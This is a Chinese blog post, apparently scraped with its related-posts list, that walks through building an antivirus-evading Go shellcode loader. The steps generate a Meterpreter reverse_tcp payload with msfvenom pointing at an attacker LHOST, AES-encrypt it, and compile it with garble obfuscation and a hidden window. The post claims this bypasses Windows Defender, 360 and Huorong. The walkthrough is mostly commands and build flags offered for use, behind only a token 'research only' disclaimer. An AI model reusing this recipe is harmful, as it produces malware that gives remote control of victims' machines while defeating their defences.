免杀方法(十)GO免杀shellcode加载器 — go-shellcode-loader
项目作者:HZzz
项目地址:https://github.com/HZzz2/go-shellcode-loader
一、工具介绍
GO混淆免杀shellcode加载器AES加密,混淆反检测 过DF、360和火绒。
二、安装与使用
1、获取项目
git clone https://github.com/HZzz2/go-shellcode-loader.git
cd go-shellcode-loader
//下条命令安装第三方混淆库
GitHub地址:https://github.com/burrowers/garble
go install mvdan.cc/garble@latest
2、生成shellcode并base64
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.rawbase64 -w 0 -i rev.raw > rev.bs64cat rev.bs64
3、复制到aes-sc.go中的44行替换payload
运行aes-sc.go生成AES加密后的值go run aes-sc.go复制输出的值到go-sc.go中的52行替换payload
4、编译成exe可执行程序
garble -tiny -literals -seed=random build -ldflags="-w -s -H windowsgui" -race go-sc.go
5、参数解释:
garble(混淆库):
-tiny 删除额外信息
-literals 混淆文字
-seed=random base64编码的随机种子
go:
-w 去掉调试信息,不能gdb调试了
-s 去掉符号表
-H windowsgui 隐藏执行窗口,不占用 cmd 终端。(被查杀率高)
-race 使数据允许竞争检测,编译时改变了生成后的文件特征, 使得杀软无法检测,当然有一天也会失效的。
编译后得到go-sc.exe
免杀效果不错。
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
成熟的人眼里满是前途,稚嫩的人眼里满是爱恨情仇
免杀方法(十)GO免杀shellcode加载器 — go-shellcode-loader相关推荐
- 免杀方法(七)c#xor加载器
c#是很流行的编程语言,也可以用它来做一个加载器运行shellcode,生成出来的 文件特别的小,可以很好的投递传输. 项目地址https://github.com/antman1p/ShellCod ...
- 【工具分享】免杀360火绒的shellcode加载器
微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 免杀效果 该shellcode加载器目前可以过360&火绒,Windows Defender没戏... 代码和思路暂不开源! 你可以在我的 ...
- ShellCode_Loader - MsfCobaltStrike免杀ShellCode加载器加密工具
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具 文章目录 ShellCode_Loader - Msf&Cobal ...
- java 加载shellcode_通用Shellcode加载器
Shellcode加载器是一种基本的规避技术.尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为.例如,很多安全产品可能会在内 ...
- shellcode加载器
不能有全局变量 (其实也是使用了绝对地址) 不能使用常量字符串 char szBuffer[] = "ShellCode"; //会使用常量区,所以不可用//写成 char szB ...
- shellcode加载器--从入门到放弃
文章目录 重剑无锋--代码篇复现 1.C/C++(vs2019) (1).指针执行 shellcode放在data段 shellcode放在栈上,复制到堆上 shellcode放在web服务器上 使用 ...
- 免杀方法(四)Python免杀shellcode加载器
项目作者:HZzz2 项目地址:https://github.com/HZzz2/python-shellcode-loader 一.工具介绍 免杀方式 msfvenom生成raw格式的shellco ...
- 网络安全进阶篇之免杀(十四章-7)C#加载器过360
一. 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件.它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀 ...
- 最简单的加载器免杀思路
本文首发于先知社区:https://xz.aliyun.com/t/9385 这部分源代码开放:https://github.com/MrWQ/HanGuang 最简单的加载器免杀思路 将加载器的变量 ...
最新文章
- 机器学习模型部署都有哪些坑?
- json对象与字符串互转方法
- Linux 环境安装 Node、nginx、docker、vsftpd、gitlab
- [剑指offer] 34. 第一个只出现一次的字符
- circle函数用法 turtle_Turtle库与Time库基础知识分享(详细)
- 一个通过Flash设计与Flex结合开发的网站www.mapgle.cn
- 【汇编语言】状态标志符(CF/OF/SF/ZF)在运算(ADD/SUB/ADC/SBB)过程中的响应变化
- eq相等,smarty 比较操作符!时间戳
- 标识符的命名规定java 0126
- php只取时间的下士_PHP 获取时间的各种处理方式!
- Gnome2.30 GDM圖片風格設置方式
- 原来这么简单就可以实现无纸化办公
- 如何在Web App Project 或者 Web Site Project的App_Code 内使用 Profile/ProfileCommon
- 天瑞地安科技集团:APP软件如何优化
- [导入]Reporting Services 6: 在服务器端报表中筛选数据
- 红帽(redhat linux) 初级认证(RHCSA)考点详解
- 电机控制程序设计经验
- “新产业50人论坛”之清华龙桂鲁教授:量子信息与创新发展
- 在linux虚拟机上显示摄像头视频(V4L2编程)
- Google基本查询语法
热门文章
- php cms 源码小说,PHPMAOS 强大的小说CMS系统
- mysql 最后版本_mysql – 如何选择帖子的最后编辑版本?
- HTML期末大学生网页设计作业——奇恩动漫HTML (1页面) HTML+CSS+JS网页设计期末课程大作业
- 什么是集中权限管理?为什么要集中权限管理?
- 计算机三级东莞考点,2016年9月东莞计算机三级四级准考证打印入口,计算机等级考试时间查询...
- 计算机二级access选择题题库_全国计算机等级考试二级access选择题包括哪些
- 【MM小贴士】从 purchase 到 payment 全流程演示
- hive lateral view explode列拆分与行转列用法
- 广东石油化工学院计算机考研资料汇总
- 面试的技巧!【精品必看】转自猫扑